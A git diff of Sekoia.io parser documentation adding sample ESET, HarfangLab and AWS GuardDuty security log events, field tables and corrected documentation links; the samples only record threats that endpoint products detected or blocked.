Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -1054,3 +1053,6 @@ The following table lists the fields that are extracted, normalized under the EC |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.name` | `keyword` | Short name or login of the user. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Eset/eset_protect). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md new file mode 100644 index 0000000000..2eed679fd5 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md @@ -0,0 +1,471 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_alert_1" + + + ```json + { + "event_type": "ESET Inspect Alert", + "ipv4": "3.4.5.6", + "hostname": "desktop01.example.com", + "os_name": "Microsoft Windows Server 2012 R2 Standard", + "group_name": "Example/Domain Controllers", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:08:10", + "severity": "Warning", + "processname": "%SYSTEM%\\nslookup.exe", + "username": "nt authority\\system", + "rulename": "Nslookup wrote a file [F0500]", + "count": 1, + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC", + "eialarmid": "1234", + "eiconsolelink": "https://dark.example.org:443/console/detection/1234", + "computer_severity_score": "60", + "severity_score": "46" + } + ``` + + + +=== "test_alert_2" + + + ```json + { + "event_type": "ESET Inspect Alert", + "ipv4": "3.4.5.6", + "hostname": "desktop01.example.com", + "os_name": "Microsoft Windows Server 2012 R2 Standard", + "group_name": "Example/Domain Controllers", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:08:10", + "severity": "Warning", + "processname": "%SYSTEM%\\nslookup.exe", + "username": "nt authority\\system", + "rule_name": "Nslookup wrote a file [F0500]", + "count": 1, + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC", + "eialarmid": "1234", + "eiconsolelink": "https://dark.example.org:443/console/detection/1234", + "computer_severity_score": "60", + "severity_score": "46" + } + ``` + + + +=== "test_audit_event_1" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:05:05", + "severity": "Information", + "domain": "Update modules", + "action": "Update", + "detail": "Modules successfully updated.", + "user": "jdoe", + "result": "Success" + } + ``` + + + +=== "test_audit_event_2" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:14:03", + "severity": "Information", + "domain": "Native user", + "action": "Logout", + "target": "Administrator", + "detail": "Logging out native user 'Administrator'.", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_3" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:59:26", + "severity": "Information", + "domain": "ESET INSPECT", + "action": "Marked as Resolved", + "target": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "detail": "Resolved via ESET INSPECT", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_4" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "os_name": "Microsoft Windows Server 2019 Datacenter Evaluation", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:58:28", + "severity": "Information", + "domain": "ESET INSPECT", + "action": "Detections", + "target": "00000000-0000-0000-7002-000000000002", + "detail": "Detection \"Rule; Suspicious Service Executed [B0902]\" resolved", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_5" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "detail": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Success" + } + ``` + + + +=== "test_audit_event_6" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Success" + } + ``` + + + +=== "test_audit_event_7" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Failure" + } + ``` + + + +=== "test_audit_event_8" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "john.doe@example.com", + "result": "Failure" + } + ``` + + + +=== "test_firewall_1" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "process_name": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_2" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "processname": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_3" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "processname": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_4" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "destination_address": "1.2.3.4", + "source_address_type": "IPv4", + "destination_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "process_name": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_hips_1" + + + ```json + { + "event_type": "HipsAggregated_Event", + "ipv4": "192.168.30.181", + "hostname": "test-w10-uefi", + "group_name": "Lost & found", + "source_uuid": "5dbe31ae-4ca7-4e8c-972f-15c197d12474", + "occured": "21-Jun-2021 11:53:21", + "severity": "Critical", + "application": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\java.exe", + "operation": "Attempt to run a suspicious object", + "target": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\trojan.exe", + "action": "blocked", + "handled": true, + "rule_id": "Suspicious attempt to launch an application", + "aggregate_count": 2 + } + ``` + + + +=== "test_hips_2" + + + ```json + { + "event_type": "HipsAggregated_Event", + "ipv4": "192.168.30.181", + "hostname": "test-w10-uefi", + "group_name": "Lost & found", + "source_uuid": "5dbe31ae-4ca7-4e8c-972f-15c197d12474", + "occured": "21-Jun-2021 11:53:21", + "severity": "Critical", + "application": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\java.exe", + "operation": "Attempt to run a suspicious object", + "target": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\trojan.exe", + "action": "blocked", + "handled": true, + "rule_id": "Suspicious attempt to launch an application", + "aggregate_count": 2 + } + ``` + + + +=== "test_threat_1" + + + ```json + { + "event_type": "Threat_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "Example/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 08:21:10", + "severity": "Warning", + "threat_type": "Trojan", + "threat_name": "Win32/ShellcodeRunner.B", + "threat_flags": "Variant", + "scanner_id": "Idle scanner", + "scan_id": "ndl3714149360.dat", + "engine_version": "29184 (20240507)", + "object_type": "File", + "object_uri": "file:///C:/Windows/Temp/tmpsesusx.exe", + "action_taken": "Cleaned by deleting", + "threat_handled": true, + "need_restart": false, + "username": "EXAMPLE NT\\SYSTEM", + "firstseen": "07-May-2024 07:44:39", + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC" + } + ``` + + + +=== "test_threat_2" + + + ```json + { + "event_type": "Threat_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "Example/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "06-May-2024 14:39:17", + "severity": "Warning", + "threat_type": "Trojan", + "threat_name": "Win32/ShellcodeRunner.B", + "threat_flags": "Variant", + "scanner_id": "On-demand scanner", + "scan_id": "ndl1556677733.dat", + "engine_version": "29180 (20240506)", + "object_type": "Operating memory", + "object_uri": "file:///", + "action_taken": "Contained infected files", + "threat_handled": true, + "need_restart": false, + "username": "Example\\jdoe" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md b/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md index 5bd8719c34..f0bfeb2b95 100644 --- a/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md +++ b/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "denied_connection.json" diff --git a/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md b/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md index 91d96dee36..0f5dbe160f 100644 --- a/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md +++ b/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md @@ -30,7 +30,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alert.json" diff --git a/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md b/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md index ba3d3a9f75..5719781c07 100644 --- a/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md +++ b/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "continue.json" diff --git a/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md b/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md index 75d7f3651a..66e68bf6e7 100644 --- a/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md +++ b/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_accept.json" diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md index aef85030c0..7bf09eb7b5 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md @@ -39,7 +39,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "agentlog.json" @@ -1147,6 +1147,61 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "powershell.json" + + ```json + + { + "message": "{\"groups\": [{\"id\": \"14989c86-9f2f-4d8d-92b5-1210034ca640\", \"name\": \"SERVERS\"}], \"script_block\": \"$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\\t\\t\\t\\t\\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }\", \"process_image_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"sha256\": \"cebeed9684d8b8cbd821db554e5bb4937ffa1d32f2ef57481866c5f0b09838b0\", \"@event_create_date\": \"2024-08-02T09:03:13.833000Z\", \"@version\": \"1\", \"log_type\": \"powershell\", \"@timestamp\": \"2024-08-02T08:56:47.681487513Z\", \"pid\": 26748, \"tenant\": \"e13f90f553ce3a9e\", \"script_path\": \"\", \"agent\": {\"osproducttype\": \"Windows Server 2016 Datacenter\", \"version\": \"3.8.16\", \"additional_info\": {}, \"ostype\": \"windows\", \"osversion\": \"10.0.14393\", \"hostname\": \"srv-gmao-prod\", \"distroid\": null, \"dnsdomainname\": \"cmnshipyard.local\", \"agentid\": \"9f298e79-f284-4276-9176-83a02c40c8f0\", \"domain\": null, \"domainname\": \"CMNSHIPYARD\"}, \"incomplete\": false, \"process_unique_id\": \"de5434d5-f284-4276-7c68-00312b6f2996\"}", + "event": { + "dataset": "powershell" + }, + "@timestamp": "2024-08-02T09:03:13.833000Z", + "action": { + "properties": { + "ScriptBlockText": "$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\t\t\t\t\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }" + } + }, + "agent": { + "id": "9f298e79-f284-4276-9176-83a02c40c8f0", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [ + "{\"id\": \"14989c86-9f2f-4d8d-92b5-1210034ca640\", \"name\": \"SERVERS\"}" + ] + }, + "host": { + "domain": "CMNSHIPYARD", + "hostname": "srv-gmao-prod", + "name": "srv-gmao-prod", + "os": { + "full": "Windows Server 2016 Datacenter", + "version": "10.0.14393" + } + }, + "log": { + "hostname": "srv-gmao-prod" + }, + "organization": { + "id": "e13f90f553ce3a9e" + }, + "process": { + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + }, + "related": { + "hosts": [ + "srv-gmao-prod" + ] + }, + "user": { + "roles": "SERVERS" + } + } + + ``` + + === "process-event.json" ```json @@ -1197,6 +1252,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "SFRTAOA" }, + "organization": { + "id": "0198bff0ef04d4a8" + }, "process": { "command_line": "C:\\windows\\system32\\cmd.exe /c wmic /namespace:\\\\root\\Microsoft\\Windows\\Defender path MSFT_MpComputerStatus get /format:list", "executable": "C:\\Windows\\System32\\cmd.exe", @@ -1564,6 +1622,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "jdoe" }, + "organization": { + "id": "6685e1111111" + }, "process": { "command_line": "test1 query type= service", "executable": "C:\\Windows\\test.exe", @@ -1669,6 +1730,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "SARTE03" }, + "organization": { + "id": "8029547657723b01" + }, "related": { "hosts": [ "SARTE03" @@ -1706,6 +1770,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "rule_level": "critical", "status": "new", "threat_id": "55" + }, + "organization": { + "id": "11111111111111111111" } } @@ -1739,6 +1806,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "status": "new", "threat_id": "829" }, + "organization": { + "id": "111111111111111" + }, "user": { "roles": "MyGroup!" } @@ -1825,9 +1895,15 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "sfreort" }, + "organization": { + "id": "2222222222222222" + }, "related": { "hosts": [ "sfreort" + ], + "ip": [ + "1.2.3.4" ] }, "sekoiaio": { @@ -1852,6 +1928,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "server": { "domain": "EXAMPLE" }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, "user": { "id": "S-1-0-0", "roles": "Group1,Group2", @@ -1983,6 +2063,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "hosts": [ "REDACTED" + ], + "ip": [ + "166.88.151.58" ] }, "sekoiaio": { @@ -2007,6 +2090,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "server": { "domain": "WORKGROUP" }, + "source": { + "address": "166.88.151.58", + "ip": "166.88.151.58" + }, "user": { "id": "S-1-0-0", "target": { @@ -2160,10 +2247,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hosts": [ "REDACTED" ], + "ip": [ + "10.84.128.186" + ], "user": [ "ANONYMOUS LOGON" ] }, + "source": { + "address": "10.84.128.186", + "ip": "10.84.128.186" + }, "user": { "domain": "AUTORITE NT", "name": "ANONYMOUS LOGON" @@ -2227,6 +2321,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "hostname": "DS01" }, + "organization": { + "id": "1111111111111111" + }, "related": { "hosts": [ "DS01" @@ -2256,6 +2353,8 @@ The following table lists the fields that are extracted, normalized under the EC | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | |`action.properties` | `object` | A detailed set of attributes associated with a specific action, typically involving user authentication or a network event. It contains the following keys: | +|`action.properties.Path` | `keyword` | | +|`action.properties.ScriptBlockText` | `keyword` | | |`action.properties.TaskContentNew_Args` | `keyword` | | |`action.properties.TaskContentNew_Command` | `keyword` | | |`agent.id` | `keyword` | Unique identifier of this agent. | diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md index 65b8d0e93e..a414d943e3 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md @@ -1078,6 +1078,47 @@ In this section, you will find examples of raw logs as generated natively by the +=== "powershell" + + + ```json + { + "groups": [ + { + "id": "14989c86-9f2f-4d8d-92b5-1210034ca640", + "name": "SERVERS" + } + ], + "script_block": "$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\t\t\t\t\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }", + "process_image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "sha256": "cebeed9684d8b8cbd821db554e5bb4937ffa1d32f2ef57481866c5f0b09838b0", + "@event_create_date": "2024-08-02T09:03:13.833000Z", + "@version": "1", + "log_type": "powershell", + "@timestamp": "2024-08-02T08:56:47.681487513Z", + "pid": 26748, + "tenant": "e13f90f553ce3a9e", + "script_path": "", + "agent": { + "osproducttype": "Windows Server 2016 Datacenter", + "version": "3.8.16", + "additional_info": {}, + "ostype": "windows", + "osversion": "10.0.14393", + "hostname": "srv-gmao-prod", + "distroid": null, + "dnsdomainname": "cmnshipyard.local", + "agentid": "9f298e79-f284-4276-9176-83a02c40c8f0", + "domain": null, + "domainname": "CMNSHIPYARD" + }, + "incomplete": false, + "process_unique_id": "de5434d5-f284-4276-7c68-00312b6f2996" + } + ``` + + + === "process-event" diff --git a/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md b/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md index 6f856fc53f..4347b82ee9 100644 --- a/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md +++ b/_shared_content/operations_center/integrations/generated/3e060900-4004-4754-a597-d2944a601930.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_accesskey_apicall.json" @@ -911,6 +911,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "type": "Recon:EC2/PortProbeUnprotectedPort" }, + "source": { + "ips": [ + "198.51.100.0", + "198.51.100.1" + ] + }, "threats": { "evidence": [ "{\"threatListName\": \"GeneratedFindingThreatListName\", \"threatNames\": [\"GeneratedFindingThreatName\"]}" @@ -931,6 +937,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "provider": "aws", "region": "eu-west-2" }, + "destination": { + "address": "10.0.0.23", + "ip": "10.0.0.23" + }, + "related": { + "ip": [ + "10.0.0.23", + "198.51.100.0" + ] + }, + "source": { + "address": "198.51.100.0", + "ip": "198.51.100.0" + }, "threat": { "enrichments": [ { @@ -1196,6 +1216,7 @@ The following table lists the fields that are extracted, normalized under the EC | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | |`agent.version` | `keyword` | Version of the agent. | +|`aws.guardduty.destination.ips` | `list` | Destination IPs when there is several | |`aws.guardduty.finding.accesskey` | `object` | Access Key details | |`aws.guardduty.finding.ecs` | `object` | ECS Details | |`aws.guardduty.finding.eks.details` | `object` | EKS cluster details | @@ -1216,6 +1237,7 @@ The following table lists the fields that are extracted, normalized under the EC |`aws.guardduty.finding.service.resource.role` | `keyword` | Resource role | |`aws.guardduty.finding.type` | `keyword` | Type of the finding | |`aws.guardduty.finding.volume.details` | `list` | volume details | +|`aws.guardduty.source.ips` | `list` | Source IPs when there is several | |`aws.guardduty.threats` | `object` | Present threats | |`aws.guardduty.threats.evidence` | `keyword` | Flattened version of evidence concerning the event | |`cloud.account.id` | `keyword` | The cloud account or organization id. | diff --git a/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md b/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md index 511c43e7cc..7b346bee09 100644 --- a/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md +++ b/_shared_content/operations_center/integrations/generated/3f330d19-fdea-48ac-96bd-91a447bb26bd.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_application_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md b/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md index fc2fae3cd7..edc48d5da1 100644 --- a/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md +++ 